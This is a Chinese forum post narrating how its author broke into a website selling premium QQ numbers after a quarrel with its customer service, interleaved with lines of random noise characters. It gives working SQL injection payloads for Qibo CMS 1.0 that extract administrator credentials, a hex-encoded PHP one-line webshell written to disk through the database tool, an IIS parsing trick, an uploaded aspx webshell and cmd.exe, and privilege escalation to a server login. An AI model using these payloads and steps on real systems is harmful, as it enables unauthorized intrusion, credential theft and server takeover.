1 D3 l1 m O; Z S: P! Y
% Y* A- d9 P3 \4 h7 `* n) C! M
1 F* X; L1 t7 k, h, r, p3 G. P' w1 `0 x) g
一、踩点寻找漏洞
0 G2 O* j& i# ?, t0 z3 \闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
& ?& `4 h1 C4 X6 |( S5 n! O- ~( x随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
$ V! Q |* q p先注册一个用户,记住注册时候的邮箱以uid号,
, ~$ f0 |3 `$ i- {
# A* V, x' w* O7 E" ^+ |2 L# w
* }* R: [' ^5 K1 S0 S然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
3 k; ?5 }, s) ?* X& W ' X5 Q: ] {- P3 G. _/ C. D
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23 1 @# Y7 F& ~2 l1 C
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图: 8 ^: B( e7 W* z, u
# n$ Q. m6 e9 ]2 t+ s确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23 : g) W! z8 ~8 l9 h' I
: a3 j4 E; t' O6 f& v5 V% A% H7 G0 Z
2 R$ M0 |7 a7 ?* E* [解密进后台如图: ) F6 J3 P3 ^- d; [( E, M
: S" m' ~) o8 M
7 B2 F; q$ y' B, l : d( D7 x4 {* A# w& W: b) x$ {- N
二、后台getwebshell
7 \9 f! u" z5 P4 [: z# y进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
/ b _! E4 y9 R; u% U+ M5 m8 H0 o/ C * e( j( G# A: u$ S
% j- j1 r% `0 W
+ V. `' n3 _- U1 o) l然后点确定,添加提示 0 t, C6 C O& w9 \* s0 u& D) K
: w! F0 H) a1 x+ ^, B- N
1 }5 N- Z6 u. `, D* X; o5 L7 R ; E. O! g0 `9 c! c* n
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
7 ?; A8 o; n6 @( u) u3 n
H/ | S: k+ c0 G! ^ " K& P: Y1 S8 @- F! V4 p
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
8 z# u0 k* v0 {5 e% S; ~! f$ q" r" Z如图: 9 h! {' t# w9 E4 O- y
, [" ]6 \+ n: a7 q4 h2 m
% H# w: d' v1 h; J0 A# |6 J / k u1 ]* m% }! F7 @
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开 $ D: Z, o4 Y- \3 _
7 K7 H/ X r& ~1 Z7 t9 P ) b. U' i$ X- R& F0 j
) E& Q* s4 ~6 o" j; n- S- l# ~6 [
三、提权进服务器 . B* H/ M9 P% y4 r b; X6 ~
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
+ B; o. ~3 O$ ~& X
: b# u# Z9 i) {- k, f
0 q* w8 b1 N6 f; f+ H& t w* w4 a啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
: i3 g3 q5 S9 T. w! ~2 Q
: p5 S; s- C3 `$ j: b; @! Z
% h$ M3 r8 F$ J/ V! r; L然后登陆服务器如图:
- v6 o8 b' h. W Z3 F . M* [ {' Y+ W! d* z6 M
1 {& C7 K0 F9 j: p( l: K! f
. t6 M# d" f- l) ~% i
$ w$ O/ P& @0 \* d6 S' a6 A& P
+ Y; Z0 v1 v; i6 U ~* J难怪普通刀连接不上,原来是有狗。
" m4 g; d" g; f3 _% j2 m2 d, d1 c. U 1 P Y# b2 h& _; j9 W8 ]3 | r
2 P9 ?$ x r# q! [: }3 x% I2 m7 k; f 1 i, {$ I; C6 g. g: t" b# U `
) q) R7 s2 g" v
) C4 E1 E. F* z' v5 F
% {8 k: M+ H7 M2 L8 X |